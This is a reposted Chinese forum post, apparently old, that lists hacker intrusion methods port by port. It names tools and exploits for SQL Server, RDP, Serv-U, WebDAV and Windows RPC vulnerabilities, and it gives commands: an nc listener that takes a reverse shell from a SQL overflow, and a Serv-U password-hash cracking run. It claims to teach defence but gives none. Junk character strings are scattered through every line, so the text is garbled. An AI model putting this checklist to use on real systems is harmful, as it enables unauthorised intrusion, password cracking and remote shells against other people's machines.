|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
7 t9 ~" k5 N. v% Z& b % V f h( i3 r4 X0 L6 E
1 c0 u" N5 x2 M4 M' {- l: U `$ S. [ 1. 1433端口入侵
- |4 w [5 l2 p9 F2 |! ^
- a" d0 m, B& Y# l3 J scanport.exe 查有1433的机器
1 D- T+ O; u' Y H# |0 P4 M
2 f' W8 Y6 k; W SQLScanPass.exe 进行字典暴破(字典是关键) # H. S; q% s/ g+ n0 B2 T* b6 D* X
) C; p1 s) u$ N; C7 M 最后 SQLTools.exe入侵
0 K4 u$ A5 K" `# B; j Z4 @3 K- c- O! b7 l- p: J6 t
=============================
' f6 D1 d/ t0 X0 E* T
C. b+ A% S: [( G 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
" [" H$ V' @7 n( N3 A. v1 H' _5 s8 A; T- L8 T
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 ; L" r; N7 {! ^! X# H) p
1 S+ T6 }5 `( C# D
(以上反向的,测试成功)
5 R1 v7 m9 @1 ^% r1 F% F' t0 b$ a
sqlhelloz.exe 入侵ip 1433 (这个是正向连接) * o1 N9 C( ` T
" _; L. M- M, R( y% `
2. 4899端口入侵 1 X% L8 C, M3 d" {- J
7 _0 h* ~0 q. ?" x3 W5 b 用4899过滤器.exe,扫描空口令的机器
1 d) j+ ]8 O+ ~5 W6 K5 b5 E7 _. v! }! ?5 c8 A
3. 3899的入侵 : G1 o5 c' S9 O( [2 J/ V, u
( ?5 e- ?, e7 C+ D( u
对很早的机器,可以试试3389的溢出(win3389ex.exe) - h2 @ N2 a0 Q3 C! W& O& V |
' m& z; [& h9 X. b4 a5 b, s y 对2000的机器,可以试试字典暴破。(tscrack.exe)
. h6 e' R. d( Q/ ^' T + q$ p4 B* N5 Y i, E) K" |
4. 80入侵
! U& q( f1 z, G# p$ S* q q. X6 U S& O
对sp3以前的机器,可以用webdav入侵;
: b6 P5 I! O% b6 Q# H( D" j, m& t; ]
) P* ] e" P3 E5 I3 g! r, x# m4 K 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 1 Q$ \" l% d4 m8 x" I3 v6 \
$ M5 s% j" K2 d4 f" F
可以利用SQL进行注入。(小榕的注入软件)。 ; J6 Y$ i4 |3 V0 T W: C
+ @0 t: x: j8 l6 b9 \1 B8 B 5. serv-u入侵(21端口)
1 E$ q/ Y; V% r1 a) ?' [% Q
/ _0 W8 F" z C7 \ m2 K- C- z 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
9 l. R" M, p2 h1 Z0 j1 x) I8 ^; j+ g. V: L; B) K( A
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 4 @ O! R4 r* c$ `! U$ d0 [
: R) L. i4 _. n, k2 @ ====================================== % K, q2 A2 l6 {1 j& O
5 s' X0 P& P* g" j( q& `& |. V 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) ' x. _* w) c, e+ a/ R* i
& h t7 f! w7 T' J% G/ U
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A - l3 o x' M/ D. E' @7 `* E' h
4 ]2 e) m4 P' ]/ I6 p+ ^. x2 `
6. 554端口 1 g7 n+ i" j0 C' T: E: R' W" Q
) h' @1 q' G" ]( Z) V/ L# d ]$ p
用real554.exe入侵。
/ K: T5 z; C* a( j7 E
" ?7 Z o+ C# v1 A/ A 7. 6129端口
9 z# ~/ w. U9 K# D. ] p9 o& A5 _5 p( B0 K; Y+ m2 E
用DameWare6129.exe入侵。
5 @& V+ e9 Z8 f
+ p+ @4 B3 B' E. V: s6 } 8. 系统漏洞 & l/ L0 O( V* [
6 w9 H6 S M7 u( A# P
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
( z4 ?: X9 u) d) B9 a: M# V* | x7 s8 L5 p" m/ {( k
进行溢出入侵。
* o9 h3 Y* C- g* P. }0 s" ~
0 a+ l9 @: J. j' H0 ` 9. 3127等端口
+ J6 J7 X) b( Z) Q0 @3 H1 H0 _
5 X* b2 ?5 T) p. Z 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 $ T, r: P" L! i/ @2 N
5 z0 Z4 B% g) ?& G. @2 J
10. 其他入侵 1 Z$ `9 [) s* p7 J9 w
u9 M! ~( m' M
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。% l Y7 \; E: L& U5 o: d
3 S0 }; M3 e q" K1 f转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|